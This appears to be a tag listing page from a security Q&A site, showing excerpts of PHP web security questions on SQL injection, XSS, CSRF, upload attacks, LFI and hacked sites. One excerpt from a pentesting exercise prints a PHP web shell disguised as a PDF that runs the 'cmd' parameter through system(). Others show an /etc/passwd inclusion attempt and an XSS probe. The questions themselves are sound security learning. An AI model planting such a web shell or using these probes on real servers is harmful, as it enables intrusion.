Tagged Questions
2
votes
1answer
98 views
Is this a bot fishing for security vulnerabilities on my site?
I am running a webpage for my family with a feature to track users and guests. Since its all just family stuff no one ever visits this server, and I hardly see more than 2-3 of us logged on at the ...
1
vote
0answers
113 views
'Ghost' access to a php file on a web server
I'm developing a personal project and one part of the project is a php website, hosted at hostinger as a free plan, that allow clients to ping to it and stores the WAN IP and the NAT IP of them.
...
1
vote
1answer
75 views
Path Truncation not working in PHP while exploiting LFI
From what I understand in PHP '/etc/passwd/' or '/etc/passwd/./././' should be treated just the same as '/etc/passwd'
I am using PHP 5.4 and this does not seem to be true:
php -r ...
9
votes
6answers
4k views
Why is php not used for banking sites or for a banking transaction?
Other programming languages popular on the web, such as Java and .NET, are used for banking sites. However, I've rarely (if ever) seen a PHP application designed to be deployed for a banking site.
...
3
votes
3answers
134 views
Is web app safe in not public folder?
I'am wondering if it's really safe to use this structure of my web application.
WEBAPP
Application
Controllers
Models
Views
...
Framework
...
...
1
vote
0answers
98 views
Failed to connect to netcat reverse shell
I am doing an exercise of PentesterLab, I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
...
8
votes
3answers
10k views
Is there any SQL injection for this PHP login example?
I want to write a login form, and I got one example from the web.
I want to know, if there is any SQL injection for this code? If there is, what could the exploit's web form entry look like?
This is ...
1
vote
1answer
133 views
WordPress Private Expoit? [closed]
I have a friend who said he has a private exploit for all WordPress ran websites. I asked him to take down my private blog, to see if it is real. He couldn't do it. I tried to get some more ...
2
votes
4answers
656 views
Malicious code in image. Harmful?
In my website, a user can upload his profile picture. After analysis of some pictures, I have found some pictures with malicious PHP code, just like the upload script. As an example, I have found a ...
1
vote
1answer
167 views
Have I done enough not be compromised through image uploading
I know that you can never be sure that you have done enough to be secure, and I also know that file uploading is hard to make correct. Before asking this question I read some of the related posts here ...
0
votes
0answers
38 views
Storing hashed or encrypted password in session? [duplicate]
I need users to be able to encrypt and decrypt without entering their passwords every time.
One way is to store the hashed password in session, and use it for encryption and decryption. Problem with ...
0
votes
1answer
138 views
False Positives- Server side protection against XSS
I read about XSS attacks and its prevention mechanism on server-side. It seems only protection is to sanitize the input by escaping special characters on server side (Using some PHP functions such as ...
0
votes
1answer
153 views
XSS attack vector without forward slash?
is there an XSS attack vector that allows the inclusion of a external .js file without having to use forward slashes?
let's say the path of the file is somewebsite.com/js/xss.js
Is there a way to ...
1
vote
2answers
126 views
Is Temporary XSS a Problem?
I use a site on a regular basis so I wanted to make sure it was secure. One of the things I checked was that when I changed my first name to <img src="http://blah.blah/blah/blah.notanextension" ...
0
votes
1answer
114 views
Removing Unnecessary Services & Packages in a MySQL Ubuntu 12.04 Server [closed]
As part of hardening a MySQL 5.6 server running on Ubuntu 12.04 LTS, unnecessary services and packages will have to be removed.
For a server that is serving only as a MySQL server, what services and ...
0
votes
1answer
115 views
Possible ways of exploiting PHP register_globals [closed]
I have a PHP script that executes a bunch of commands to verify that a user is logged.
if (( isset ($password) && $password!="" && auth($password,$hidden_password)==1) || ...
2
votes
2answers
438 views
Unrestricted File Upload - Possible exploits
During a penetration test (exercise) on a IIS web server + MYSQL DBMS, I have found an Unrestricted File Upload vulnerability for which I can upload a .php file.
So I have tried to upload a php ...
4
votes
5answers
10k views
Playing with Referrer Header
There are 2 sites:
http://www.site1.com
http://www.site2.com
http://www.site1.com contains link to http://www.site2.com as
<a href="http://www.site2.com/">link<a/>
When user clicks ...
0
votes
1answer
107 views
File-structure when using token
I'm using a form-token to secure the validation process of my php-file.
Basically the structure of the php-file looks like this:
if ($_POST) {//form has been submitted?
if (validateFormToken) {
...
2
votes
1answer
146 views
Submit form with token
I have a token that I want to use to prevent direct access of some php-files.
Some of these php-files are loaded via AJAX.
The token is used with a session to secure form submission AND to prevent ...
3
votes
3answers
469 views
Tokenless REST API security concerns
I'm designing an API in PHP/MySQL that, by its design, will not store a user's password in the database and thus does not generate authorization tokens for the client to hold. The reason for this is ...
5
votes
1answer
298 views
Web Applications terminate strings on null-byte
I have just been doing some penetration testing on a site, and I have noticed (and I have noticed before but now seems like a good point to bring it up) that putting a null byte in the search string ...
1
vote
1answer
193 views
PHP gethostbyname security implications
I'm working on a PHP application.
There is a requirement to find IP's by hostname and i have to resort to gethostbynamel for that.
Looks like there is no other way.
I was wondering if there are any ...
1
vote
1answer
254 views
If my website does not take any user input, is there any danger in showing my code and folder structure?
First time posting here; apologies for any mistakes I've made, please edit, retag, migrate as appropriate.
I have a simple homepage whose purpose is (essentially) to contain my contact info and some ...
-4
votes
3answers
285 views
PHP web application security [closed]
I am building a PHP web application, that needs enhanced security, due to the fact that it contains very sensitive information (in a database).
I think that I want to use self-signed SSL ...
34
votes
5answers
4k views
How to Securely Implement a “Remember Me” Feature?
Assuming you already have a website that implements all of the standard login stuff, what is the correct and most secure way to allow users to automatically be logged in for a certain time period ...
7
votes
4answers
786 views
Security attacks on PHP web applications
I know about following security attacks on php applications (html,php,js).
XSS
SQL Injection
CSFR
Session Hijacking /Fixation
Code Injection
Remote file injection
Should i know about any other or ...
8
votes
4answers
713 views
How dangerous is it to store password in plain text on sites like GitHub?
I have a few private repositories set up on GitHub for some of the projects I am working on for my company. These applications connect to databases and I have database authentication credentials ...
0
votes
1answer
284 views
Site Hacked - Where to go from here? [closed]
Our magento based e-commerce site was hacked over the weekend, the hackers managed to gain access to the magento files and embed some scrambled code into the get.php file in the root directory.
I ...
0
votes
1answer
81 views
Security comparisons between two approaches: how to distinguish FUD from Substance? [closed]
Background:
WorkerB and Tymac were discussing the pros-and-cons of using two different alternatives for extending a web content management system that is used in their company.
Alternative one ...
1
vote
2answers
136 views
secure certain data on my webserver
I've developed a website where people add their sensitive data. Not credit cards, but lets say they share things about themselves which are private and it wouldn't be good if other people see that ...
8
votes
3answers
5k views
Is it possible to execute a php script in an image file? [duplicate]
I have an image upload php website. Users can upload images to my website. A user claims he can hack my website using an uploaded image.
I opened all the images that he uploaded to my server with ...
15
votes
4answers
10k views
How to hijack a session?
Despite the blatant title of the question, this is actually for a genuine purpose.
My site uses PHP code like this:
$select="select id from tableA where user_id='".$_SESSION['sess_user_id']."'";
...
0
votes
2answers
160 views
how to find injected code in SQL
Recently one of my sites is hacked. The hacker used SQL injection to compromise the security. After getting SQL access he injected code in many places in database. I cleaned up many of them. But I am ...
12
votes
4answers
2k views
Is $_SERVER[ ] a safe source of data in PHP?
Can I 100% rely on $_SERVER[] to be a safe source of data that I do not need to sanitized like I do $_GET[] and $_POST[]?
Thanks.
OVERVIEW OF RESPONSES:
So it seems there is a consensus that some ...
1
vote
1answer
1k views
ASP.net vs PHP security? [closed]
I have been told that generally speaking, asp.net web apps tend to be more secure than php, since asp.net has some automatic security measures, for example, by default it doesn't allow remote file ...
2
votes
4answers
365 views
When logging out of a website is anything else required then destroying the session?
In PHP, I'm not sure if I should start the session before destroying it when a user wants to log out.
session_start();
session_destroy();
Is there anything else that needs to be done?
EDIT: I ...
3
votes
3answers
383 views
is it safe to allow external images to be attached to Blog or any Web content?
I am filtering all images that attached to any content of my blog:
Check for file extension.
Check content type using $finfo = finfo_open(FILEINFO_MIME_TYPE);
I also save the image temporary on my ...
2
votes
2answers
518 views
how to bypass “header” in php
While reading an article I encounter an interesting thing I did not know about:
if(!isset($_SESSION['usr_id']) || !isset($_SESSION['usr_name']))
{
header('Location: index.php');
}
...Which ...
4
votes
1answer
542 views
CodeIgniter CSRF confusion
I have been working with CodeIgniter for about 3 weeks and am very well on the way to loving this framework. However I have been looking at the core code of the framework and I was reading over the ...
-1
votes
1answer
147 views
setting up website for logged in users, anyone, and files no one should see (via the web) [closed]
I asked how to prevent not logged in users from seeing certain content but the solution I chose to implement encountered a problem. I chose to make my root directory for the server C:\WAMP\www\public ...
0
votes
2answers
267 views
How to restrict web access to certain countries
What are the better ways of filtering access to the web application based on Geographical location. Is it possible with a network layer firewall or we need an application layer?
0
votes
2answers
192 views
Is this code vulnerable?
I have developed a php code given below. I would like to know what are the security vulnerabilities present within this php code?
<?php
if(isset($_SESSION['id'])){
// get data ...
1
vote
1answer
135 views
Client vs Server security for business critical application (crossplatform)
We have the option to develop a software either based on
Java (but then it is only available for desktop clients using Java SE and can run maybe also as tomcat app can be multithreaded, stable, ...
0
votes
1answer
266 views
Protect database resources from fake data inputs via web forms
Scenario:
I'm working on a project that needs to accept large amounts of data (customer data) from its users. So it can be normal to have a user trying to add 10,000 or 100,000 records at a time. In ...
19
votes
5answers
2k views
Should I use Suhosin for PHP?
Suhosin can be used to increase the security of your php application.
I can really see the use of it when you are using shared hosts, with multiple (possibly evil) people running their PHP apps ...
2
votes
1answer
210 views
Is it safe to invoke PHP GD functions if you don't know whether file is a valid image?
There is image upload function in web application. After image is uploaded, it's resized using functions from PHP GD like imagecopyresampled and others. Before invocation of PHP GD's functions there ...
1
vote
1answer
203 views
Is it possibel to inject php code to roundcube errors log file via LFI vulnerability? [closed]
i tried to inject php code to roundcube errors log file, with no success. i think there is something filtering injected php code.
5
votes
4answers
1k views
Protecting against CSRF when a form is being submitted via an AJAX call
I'm using anti-CSRF tokens on all my forms to prevent CSRF attacks. Also, the tokens are being saved in the $_COOKIE variable to validate against the value I get from the form. I'm resetting the token ...
4
votes
2answers
1k views
How to find and protect against the exploited vulnerability in a PHP application based on the logged URL?
I have been attacked on a shared host server and they said I should configure my own php.ini file properly.
I have a little PHP/MySQL program with a registering function, a little admin site.
...
